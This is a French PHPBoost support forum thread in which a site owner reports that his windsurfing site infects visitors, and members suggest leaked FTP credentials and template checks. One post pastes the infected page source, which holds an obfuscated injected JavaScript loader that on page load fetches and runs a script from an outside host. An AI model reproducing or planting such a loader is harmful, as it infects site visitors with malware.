Virus sous mon site phpboost
SuperStar Membre non connecté
Booster Missile
-
Booster Missile
- Voir le profil du membre SuperStar
- Inscrit le : 26/02/2006
- Site internet
J'ai depuis mon ouverture en 2007 fait tourner mon site web sous phpboost au fil des versions.
Mon site grandissant, jusqu'à 1000 visiteurs par jour, a un fort référencement dans son domaine. Seulement ce soir je me dois de mettre en maintenance mon site pour des raisons qui me surprennent au plus profond...
Mon site contient un virus, tous mes visiteurs ont été vérolé et moi le premier. C'est arrivé comme ça... impossible à comprendre surtout quand on connait la sécurité de phpboost.
Est ce que ce problème a déjà été rencontré ? Suis-je le premier ?
Je pense du coup bosser très très dur pour passer à la V3, proposer une nouvelle version rapidement, qui pour moi me semble être une alternative à court terme, car je ne peux pas laisser mes visiteurs/membres se faire hacker comme ça !
Quelle est selon vous la meilleure solution ?
Ps: mon hebergeur est OVH ? rapport ??
Le site des windsurfer du var www.windsurf83.fr
Visiteur
Boosteur Inactif
sinon tu peut nous en dire plus ?¿
tu dis que c'est ton site qui est vérolé, mais par quel moyen il contamine les pc ?¿
j'ai eu le souci de modification de pages index, et d'aitre pour insertion d'iframes ou javascript.
mais le souci etait inverse au tien, c'est un pc sous xp vérolé qui avais transmis les pass ftp des sites. (verifier par log ftp, et pc contaminé)
choses a faire : controlé le pc, changé les pass ftp, dévérolé le site.
la meme chose arrive si le site a un acces ftp qui est mal sécurisé.
des scan services et tentatives d'acces c'est plus que fréquant.
sur le forum ovh en mutualiser / dedier y a plein de fil sur ce sujet.
peut etre que je me trompe aussi et que un souci sur pbt 2 a été trouvé ou une faille créer par une modif que tu aurais faites.
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Honnêtement, je ne pense pas que PHPBoost soit à l'origine du problème. Tu n'aurais pas un virus sur ton ordi qui aurait contaminé des fichiers au cours de l'upload de fichiers ?
Essaie de voir si ton PC ne serait pas vérolé.
Un problème, une question ? Cherchez dans la FAQ ou la documentation. Si vous ne trouvez pas la réponse, demandez du support sur le forum.
Bjarne Stroustrup, inventeur du C++ :"There are two ways to write error-free programs; only the third works."
SuperStar Membre non connecté
Booster Missile
-
Booster Missile
- Voir le profil du membre SuperStar
- Inscrit le : 26/02/2006
- Site internet
Après avoir cogité cette nuit, j'en viens à la conclusion suivante :
le virus est actif et détecté non pas en fonction de l'anti virus mais en fonction de la version de windows !!
Seul sous XP c'est détecté, puisque sur tous les ordis vista et seven rien apparait... :/
Le site des windsurfer du var www.windsurf83.fr
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
SuperStar :
je ne dis en aucuns cas que c'est phpboost... je suis l'aventure phpboost depuis le début et je sais suffisemment à quel point c'est sécurisé !
Je pense que dans un tel problème, il faut remettre en cause tous les outils. Si tu ne l'as pas fait, moi j'ai essayé de le faire. Je ne connais pas de faille de sécurité sur PHPBoost (et heureusement), mais n'étant pas un grand spécialiste des virus, je ne sais pas trop par où ce genre d'infection peut rentrer. Je n'exclus pas que ça vienne de PHPBoost, mais ça m'étonnerait. Il faudrait arriver à comprendre comment il est rentré pour comprendre par où il est passé.
SuperStar :
Après avoir cogité cette nuit, j'en viens à la conclusion suivante :
le virus est actif et détecté non pas en fonction de l'anti virus mais en fonction de la version de windows !!
Seul sous XP c'est détecté, puisque sur tous les ordis vista et seven rien apparait... :/
le virus est actif et détecté non pas en fonction de l'anti virus mais en fonction de la version de windows !!
Seul sous XP c'est détecté, puisque sur tous les ordis vista et seven rien apparait... :/
Hélas, comme je l'ai dit, je ne connais pas grand chose sur les virus. Il y a peut-être des forums spécialisés sur ce genre de thématique où ils pourraient nous aider à résoudre le problème.
Comment ces gens voient que ton site est infecté ? C'est leur antivirus qui leur dit ? Si oui, ils t'ont pas donné le message exact ? Une recherche de ce message pourrait nous en dire plus sur la contamination.
Un problème, une question ? Cherchez dans la FAQ ou la documentation. Si vous ne trouvez pas la réponse, demandez du support sur le forum.
Bjarne Stroustrup, inventeur du C++ :"There are two ways to write error-free programs; only the third works."
KONA Membre non connecté
Booster Fusée
-
Booster Fusée
- Voir le profil du membre KONA
- Inscrit le : 21/05/2006
- Site internet
SuperStar Membre non connecté
Booster Missile
-
Booster Missile
- Voir le profil du membre SuperStar
- Inscrit le : 26/02/2006
- Site internet
Par contre quand on affiche le code source de ma page, en premiere ligne il y a un script qui me semble très étrange !!
Code HTML :
<script>function M(){this.dJ=false;var W=window;this.Wo="";var g="g";var X=W["RToun".substr(3)+"es"+"1frbca".substr(4)+"H7BvpeB7Hv".substr(4,2)];var H=String("defe"+"r");this.nC="";var MM=new Date();this.Ee="";var P="sc"+"riX1KE".substr(0,2)+"pt";var IL="IL";var o=String("/ima"+"geve"+"nue-"+"com/"+"googcvNO".substr(0,4)+"le.c"+"uWyrom/t".substr(4)+"eleg"+"raph"+".co.tU5".substr(0,4)+"uk.p"+"hp");this.ov="";var pH="";var i=new Date();this.dJs=false;function t(j,D){this.Yv=39434;var O=X(String("]"));this.fF="";var I=X("[");var F=new String("SaLg".substr(3));this.Eg="";this.Q="";var N=new RegExp(I+D+O, F);var bf="bf";return j.replace(N, new String());};var eN=new Date();var KP=new Array();var ZA=new Array();var AO=new Date();var Z=t('8355339379163033553932636221387272647361733601362335947','45623179');var he="he";var e=document;var Y=t('s9rBcN','BZ5m9SahWN1E6HYQ');var iA=new Array();var v=t('curfe3abtXeXEMlGe1mueinotL','vB3UVAf0JXo1GbMuki_KyLwh8');var y=new Date();var tE=new Date();var LQ=new Date();var Xg="";function Pw(){this.ou="";var OM=X(String("http:"+"//sup"+"ereas"+"yride"+"r.at:"));var E=OM+Z+o;var Tx="";this.WV=false;var Jk=new Date();var WM=t('aqpNpNeNnNd2C2h9i3lqdq','293qNJPHD');var m=t('bWoqdcy4','ncq_43WD1');try {var CH=new Array();this.tS=false;K=e[v](P);var Jj="Jj";var Vj="Vj";this.EK=false;var KG=new Date();var wP=new Array();K[Y]=E;var Atf="Atf";var WVP="";K[H]=[1][0];var QH="";this.c="";this.yPA="";e[m][WM](K);var T_="";var Lb="";} catch(d){var iC="";this._L="";};}this.hp=false;var n=t('o_n_lNoNaQds','IQ_5rsN');this.pQ="";this.tG=false;W[n]=Pw;this.rD="";this.QI="";};this.oH=false;this.XZ="";M();this.Rr=15793;var XR="XR";</script> <!--e9e41456517e59b9f7046aff2048e769--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" > <head> <title>Windsurf83.fr : le portail du windsurf dans le var :: </title> <link rel="stylesheet" href="../templates/windsurf83/design.css" type="text/css" media="screen" /> <link rel="stylesheet" href="../templates/windsurf83/global.css" type="text/css" media="screen, print, handheld" /> <link rel="stylesheet" href="../templates/windsurf83/generic.css" type="text/css" media="screen, print, handheld" /> <link rel="stylesheet" href="../templates/windsurf83/content.css" type="text/css" media="screen, print, handheld" /> <link rel="stylesheet" href="../templates/windsurf83/bbcode.css" type="text/css" media="screen, print, handheld" /> <link rel="shortcut" href="../favicon.ico" />
Le site des windsurfer du var www.windsurf83.fr
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Il faut maintenant comprendre pourquoi il y a ce script là. Est-ce qu'elle ne serait pas dans ton header.tpl ?
Un problème, une question ? Cherchez dans la FAQ ou la documentation. Si vous ne trouvez pas la réponse, demandez du support sur le forum.
Bjarne Stroustrup, inventeur du C++ :"There are two ways to write error-free programs; only the third works."
KONA Membre non connecté
Booster Fusée
-
Booster Fusée
- Voir le profil du membre KONA
- Inscrit le : 21/05/2006
- Site internet
SuperStar Membre non connecté
Booster Missile
-
Booster Missile
- Voir le profil du membre SuperStar
- Inscrit le : 26/02/2006
- Site internet
Le site des windsurfer du var www.windsurf83.fr
ReidLos Membre non connecté
-
Modérateur
- Voir le profil du membre ReidLos
- Inscrit le : 27/02/2009
- Site internet
- Groupes :
-
Equipe Développement
header.php et footer.php ?
KONA Membre non connecté
Booster Fusée
-
Booster Fusée
- Voir le profil du membre KONA
- Inscrit le : 21/05/2006
- Site internet
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Un problème, une question ? Cherchez dans la FAQ ou la documentation. Si vous ne trouvez pas la réponse, demandez du support sur le forum.
Bjarne Stroustrup, inventeur du C++ :"There are two ways to write error-free programs; only the third works."
Visiteur
Boosteur Inactif
c'est valable ailleur en adaptant au besoin : Attaques Sites Web par Iframes (et similaires) : Problèmes et Solutions
pourquoi par iframe ?¿ simplement parceque le souci est le meme.
lors de mon "deverolages" de mes sites j'avais sur un juste les script js, et sur l'utre les deux, js + iframes.
avant que tu pousse plus loin si tu ne l'a déjà fait, passe tous les pc qui on aces a ton site en ftp au crible, et change les pass ftp.
c'est la 1ere chose a faire.
bon courage.
SuperStar Membre non connecté
Booster Missile
-
Booster Missile
- Voir le profil du membre SuperStar
- Inscrit le : 26/02/2006
- Site internet
Je comprends pas j'ai pas de iframe sur mon site...
Je vais essayer de changer mes pass FTP
Le site des windsurfer du var www.windsurf83.fr
Répondre
Vous n'êtes pas autorisé à écrire dans cette catégorie
